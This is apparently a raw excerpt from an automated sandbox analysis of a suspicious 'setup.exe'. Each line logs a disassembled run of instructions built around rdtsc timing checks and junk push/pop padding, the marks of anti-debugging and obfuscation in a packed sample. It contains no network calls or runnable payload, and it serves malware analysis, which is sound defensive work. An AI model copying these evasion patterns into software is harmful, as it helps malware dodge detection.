                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E1890 second address: 5E18A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FC16945A27Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E0CC1 second address: 5E0CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FC169461AA1h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E0CDB second address: 5E0CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E0FD0 second address: 5E0FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC169461AA2h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Ch 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E0FF7 second address: 5E1030 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FC16945A282h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FC16945A276h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007FC16945A27Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jnl 00007FC16945A276h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E1466 second address: 5E146A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E146A second address: 5E1470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E1747 second address: 5E174E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E174E second address: 5E1757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E2CAC second address: 5E2CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E2CB0 second address: 5E2CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E2D56 second address: 5E2D60 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E2E81 second address: 5E2E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E4061 second address: 5E40C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FC169461AA9h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D28D9h], esi 0x00000016 push 00000000h 0x00000018 mov esi, dword ptr [ebp+122D2A17h] 0x0000001e mov di, 03C0h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FC169461A98h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e xor si, CC13h 0x00000043 mov dword ptr [ebp+122D18A7h], esi 0x00000049 push eax 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push edx 0x0000004e pop edx 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E52DA second address: 5E52DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E52DE second address: 5E52E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E5DA7 second address: 5E5DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E6877 second address: 5E6883 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E6883 second address: 5E688A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E7485 second address: 5E748B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E748B second address: 5E748F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E748F second address: 5E7516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2F04h], edx 0x00000011 movsx esi, bx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FC169461A98h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2A73h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FC169461A98h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 jmp 00007FC169461A9Bh 0x00000057 xchg eax, ebx 0x00000058 pushad 0x00000059 push ecx 0x0000005a jmp 00007FC169461AA2h 0x0000005f pop ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 pop eax 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E7DBF second address: 5E7DDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FC16945A278h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ECF49 second address: 5ECF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0A26 second address: 5F0A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC16945A276h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0B73 second address: 5F0B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F1B5A second address: 5F1B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0B79 second address: 5F0B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F1C22 second address: 5F1C28 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F2CA5 second address: 5F2CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F2CAE second address: 5F2CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F3CA7 second address: 5F3CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F4C8C second address: 5F4CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 clc 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC16945A278h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 cld 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FC16945A278h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov eax, dword ptr [ebp+122D0775h] 0x00000050 mov dword ptr [ebp+122D2610h], esi 0x00000056 push FFFFFFFFh 0x00000058 mov ebx, dword ptr [ebp+122D2C7Bh] 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push esi 0x00000064 pop esi 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F59F6 second address: 5F59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F4CFE second address: 5F4D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F59FF second address: 5F5A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F5A03 second address: 5F5A8B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC16945A285h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FC16945A278h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c jnc 00007FC16945A27Ch 0x00000032 push edi 0x00000033 mov di, D5E1h 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a movzx ebx, si 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FC16945A278h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F6AAB second address: 5F6AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA1h 0x00000009 popad 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FC169461A96h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F8ADD second address: 5F8AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACE35 second address: 5ACE4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FC169461A96h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F6C93 second address: 5F6D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC16945A27Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FC16945A278h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+122D2ACBh] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 pushad 0x00000038 jmp 00007FC16945A27Ch 0x0000003d add ebx, dword ptr [ebp+122D5B92h] 0x00000043 popad 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov ebx, dword ptr [ebp+122D2967h] 0x00000051 mov di, si 0x00000054 mov eax, dword ptr [ebp+122D0B71h] 0x0000005a sbb edi, 58034AD8h 0x00000060 push FFFFFFFFh 0x00000062 mov dword ptr [ebp+124587CDh], ebx 0x00000068 mov bh, E5h 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push ecx 0x00000070 pop ecx 0x00000071 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F6D21 second address: 5F6D27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACE4A second address: 5ACE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F6D27 second address: 5F6D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACE4F second address: 5ACE5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC16945A276h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACE5B second address: 5ACE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FA004 second address: 5FA00A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FA00A second address: 5FA02D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC169461A98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC169461AA4h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F93B3 second address: 5F93B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FB27D second address: 5FB283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC25C second address: 5FC260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC260 second address: 5FC26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC169461A9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FF2DA second address: 5FF2DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6020C4 second address: 6020CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6020CA second address: 6020DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jng 00007FC16945A282h 0x0000000c jns 00007FC16945A276h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 600207 second address: 60020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6002D7 second address: 6002E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6002E8 second address: 6002FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Eh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 609474 second address: 609496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jo 00007FC16945A287h 0x00000011 jmp 00007FC16945A27Fh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE86E second address: 5AE878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE878 second address: 5AE89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A281h 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FC16945A276h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE89A second address: 5AE8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE8A6 second address: 5AE8B0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE8B0 second address: 5AE8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FC169461A96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA3h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608F6A second address: 608F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A283h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608F87 second address: 608F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608F8C second address: 608F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608F92 second address: 608FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608FA1 second address: 608FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608FA5 second address: 608FB1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC169461A96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608FB1 second address: 608FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608FB7 second address: 608FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA5h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60AA3C second address: 60AA52 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC16945A276h 0x00000008 jns 00007FC16945A276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60AA52 second address: 60AA63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60AA63 second address: 60AA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A27Ah 0x00000009 popad 0x0000000a popad 0x0000000b jc 00007FC16945A29Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60AA7D second address: 60AA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A62D7 second address: 5A62DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A62DB second address: 5A62FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC169461AA5h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A62FB second address: 5A6307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A6307 second address: 5A6311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC169461A96h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A6311 second address: 5A631D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC16945A276h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A631D second address: 5A6329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FC169461A96h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 610FF1 second address: 610FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
